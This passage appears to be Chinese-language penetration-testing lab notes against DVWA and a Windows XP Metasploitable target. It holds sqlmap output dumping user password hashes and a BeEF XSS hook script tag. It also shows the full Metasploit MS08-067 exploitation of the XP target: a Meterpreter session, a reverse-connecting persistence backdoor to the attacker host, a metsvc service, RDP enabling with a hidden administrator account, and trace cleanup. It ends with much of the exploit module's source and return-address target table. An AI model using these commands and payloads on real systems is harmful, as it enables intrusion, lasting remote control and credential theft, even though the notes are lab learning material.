| 3 | 1337 | http://owaspbwa/dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack |
| 4 | pablo | http://owaspbwa/dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |
| 5 | smithy | http://owaspbwa/dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
[21:58:30] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\users.csv'
[21:58:30] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
跨站脚本攻击
XSSF已经停止维护,使用Beef-XSS
https://github.com/beefproject/beef/
启动Kali Linux安装Beef-XSS
cd /etc/
git clone https://github.com/beefproject/beef.git
cd beef
./install
启动Beef
./beef
提示默认用户名和口令需要修改
root@DESKTOP-9I2FBB4:/etc/beef# ./beef
[22:52:19][!] ERROR: Default username and password in use!
[22:52:19] |_ Change the beef.credentials.passwd in config.yaml
vi config.yaml
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.4.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
# set the public setting below:
# public:
# host: "" # public hostname/IP address
# port: "" # public port will default to 80 if no https 443 if https
# and local if not set but there is a public host
# https: false # true/false
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command exec
ute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterva
l
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or event
ually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase th
e timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
geoip:
enable: true
# GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
修改user和password后启动Beef
./beef
提示信息先标记一下
[22:56:06][*] running on network interface: 10.10.10.128
[22:56:06] | Hook URL: http://10.10.10.128:3000/hook.js
[22:56:06] |_ UI URL: http://10.10.10.128:3000/ui/panel
[22:56:06][*] RESTful API key: b2400041e8e3f03c5ee4adcf8ca5cb5e620edd04
[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
[22:56:06][*] HTTP Proxy: http://127.0.0.1:6789
[22:56:06][*] BeEF server started (press control+c to stop)
里面含有hook信息
Hook URL: http://10.10.10.128:3000/hook.js
因此构造的javascript脚本应为
<script src="http://10.10.10.128:3000/hook.js"></script>
访问Beef控制台
http://127.0.0.1:3000/ui/panel
设置DVWA Security为Low后选择XSS reflected,输入javascript代码点击Submit
能够看到主机信息
其中Location根据报错信息需要GeoIP,可在我的资源中下载
[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
备注:跨站脚本攻击在互联网上攻击需要有互联网IP地址
网络服务渗透
MS08067
search ms08_067
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.10.128
set LPORT 5000
set LHOST 10.10.10.128
set target 7
exploit
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] 192.168.10.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.10.128:5000
[*] Sending stage (175174 bytes) to 192.168.10.128
[*] Meterpreter session 1 opened (192.168.10.1:2231 -> 192.168.10.128:5000 ) at 2022-04-16 11:42:28 +0800
meterpreter > sysinfo
Computer : DH-CA8822AB9589
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
添加开机启动项,当开机时连接攻击主机10.10.10.128的443端口
run persistence -X -i 5 -p 443 -r 10.10.10.128
meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at C:/Users/IDEA/.msf4/logs/persistence/DH-CA8822AB9589_20220417.5804/DH-CA8822AB9589_20220417.5804.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443
[*] Persistent agent script is 99622 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\GbwkRkc.vbs
[*] Executing script C:\WINDOWS\TEMP\GbwkRkc.vbs
[+] Agent executed with PID 4044
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
当攻击目标重启后可从已有后门连接已攻击完成主机
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
exploit
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against :443
使用metsvc将Meterpreter以系统服务的形式安装到目标主机
run metsvc
meterpreter > run metsvc
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\uIaJuExSqtDr...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >
开启目标主机远程桌面并添加用户账户
run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
在WinXP Metasploitable中可以看到远程桌面已开启
run getgui -u metasploit -p meterpreter
meterpreter > run getgui -u metasploit -p meterpreter
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: metasploit with Password: meterpreter
[*] Hiding user from Windows Login screen
[*] Adding User: metasploit to local group 'Remote Desktop Users'
[*] Adding User: metasploit to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
在WinXP Metasploitable中可以看到添加的用户情况
获取权限
getsystem
查看当前权限
getuid
system权限是系统的最高权限
提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc清除痕迹,关闭痕迹和删除添加的账号
[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
Process 2956 created.
[*] Running command reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
Successfully deleted metasploit.
刷新用户,在WinXP Metasploitable中可以看到添加的用户现已消失
提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt清除痕迹,关闭远程桌面
[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
[*] Running Command List ...
[*] Running command reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
Successfully set fDenyTSConnections of REG_SZ.
[*] Running command execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
Process 3264 created.
[*] Running command execute -H -f cmd.exe -a "/c sc stop termservice"
Process 2880 created.
[*] Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 3180 created.
在WinXP Metasploitable中可以看到远程桌面已关闭
查看MS08067源代码
exploit/windows/smb/ms08_067_netapi
C:\metasploit-framework\embedded\framework\modules\exploits\windows\smb\ms08_067_netapi.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing
NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful
exploitation events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full support for
NX bypass on 2003, along with other platforms, is still in development.
},
'Author' =>
[
'hdm', # with tons of input/help/testing from the community
'Brett Moore <brett.moore[at]insomniasec.com>',
'frank2 <frank2[at]dc949.org>', # check() detection
'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
],
'License' => MSF_LICENSE,
'References' =>
[
%w(CVE 2008-4250),
%w(OSVDB 49243),
%w(MSB MS08-067),
# If this vulnerability is found, ms08-67 is exposed as well
['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 408,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
#
# Automatic targetting via fingerprinting
#
['Automatic Targeting', { 'auto' => true }],
#
# UNIVERSAL TARGETS
#
#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
['Windows 2000 Universal',
{
'Ret' => 0x001f1cb0,
'Scratch' => 0x00020408,
}
], # JMP EDI SVCHOST.EXE
#
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
['Windows XP SP0/SP1 Universal',
{
'Ret' => 0x01001361,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
#
# ENGLISH TARGETS
#
# jduck's AlwaysOn NX Bypass for XP SP2
['Windows XP SP2 English (AlwaysOn NX)',
{
# No pivot is needed, we drop into our rop
'Scratch' => 0x00020408,
'UseROP' => '5.1.2600.2180'
}
],
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 English (NX)',
{
'Ret' => 0x6f88f727,
'DisableNX' => 0x6f8916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# jduck's AlwaysOn NX Bypass for XP SP3
['Windows XP SP3 English (AlwaysOn NX)',
{
# No pivot is needed, we drop into our rop
'Scratch' => 0x00020408,
'UseROP' => '5.1.2600.5512'
}
],
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6f8917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Arabic (NX)',
{
'Ret' => 0x6fd8f727,
'DisableNX' => 0x6fd916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf727,
'DisableNX' => 0x58fc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Czech (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Danish (NX)',
{
'Ret' => 0x5978f727,
'DisableNX' => 0x597916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 German (NX)',
{
'Ret' => 0x6fd9f727,
'DisableNX' => 0x6fda16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Greek (NX)',
{
'Ret' => 0x592af727,
'DisableNX' => 0x592b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Spanish (NX)',
{
'Ret' => 0x6fdbf727,
'DisableNX' => 0x6fdc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Finnish (NX)',
{
'Ret' => 0x597df727,
'DisableNX' => 0x597e16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 French (NX)',
{
'Ret' => 0x595bf727,
'DisableNX' => 0x595c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Hebrew (NX)',
{
'Ret' => 0x5940f727,
'DisableNX' => 0x594116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Hungarian (NX)',
{
'Ret' => 0x5970f727,
'DisableNX' => 0x597116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Italian (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Japanese (NX)',
{
'Ret' => 0x567fd3be,
'DisableNX' => 0x568016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Korean (NX)',
{
'Ret' => 0x6fd6f727,
'DisableNX' => 0x6fd716e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Dutch (NX)',
{
'Ret' => 0x596cf727,
'DisableNX' => 0x596d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Norwegian (NX)',
{
'Ret' => 0x597cf727,
'DisableNX' => 0x597d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Polish (NX)',
{
'Ret' => 0x5941f727,
'DisableNX' => 0x594216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff727,
'DisableNX' => 0x597016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Portuguese (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Russian (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Swedish (NX)',
{
'Ret' => 0x597af727,
'DisableNX' => 0x597b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP2 Turkish (NX)',
{
'Ret' => 0x5a78f727,
'DisableNX' => 0x5a7916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Arabic (NX)',
{
'Ret' => 0x6fd8f807,
'DisableNX' => 0x6fd917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Czech (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Danish (NX)',
{
'Ret' => 0x5978f807,
'DisableNX' => 0x597917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 German (NX)',
{
'Ret' => 0x6fd9f807,
'DisableNX' => 0x6fda17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Greek (NX)',
{
'Ret' => 0x592af807,
'DisableNX' => 0x592b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Spanish (NX)',
{
'Ret' => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Finnish (NX)',
{
'Ret' => 0x597df807,
'DisableNX' => 0x597e17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 French (NX)',
{
'Ret' => 0x595bf807,
'DisableNX' => 0x595c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Hebrew (NX)',
{
'Ret' => 0x5940f807,
'DisableNX' => 0x594117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Hungarian (NX)',
{
'Ret' => 0x5970f807,
'DisableNX' => 0x597117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Italian (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Japanese (NX)',
{
'Ret' => 0x567fd4d2,
'DisableNX' => 0x568017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Korean (NX)',
{
'Ret' => 0x6fd6f807,
'DisableNX' => 0x6fd717c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Dutch (NX)',
{
'Ret' => 0x596cf807,
'DisableNX' => 0x596d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Norwegian (NX)',
{
'Ret' => 0x597cf807,
'DisableNX' => 0x597d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Polish (NX)',
{
'Ret' => 0x5941f807,
'DisableNX' => 0x594217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff807,
'DisableNX' => 0x597017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Portuguese (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Russian (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Swedish (NX)',
{
'Ret' => 0x597af807,
'DisableNX' => 0x597b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
['Windows XP SP3 Turkish (NX)',
{
'Ret' => 0x5a78f807,
'DisableNX' => 0x5a7917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Windows 2003 Targets
#
# Standard return-to-ESI without NX bypass
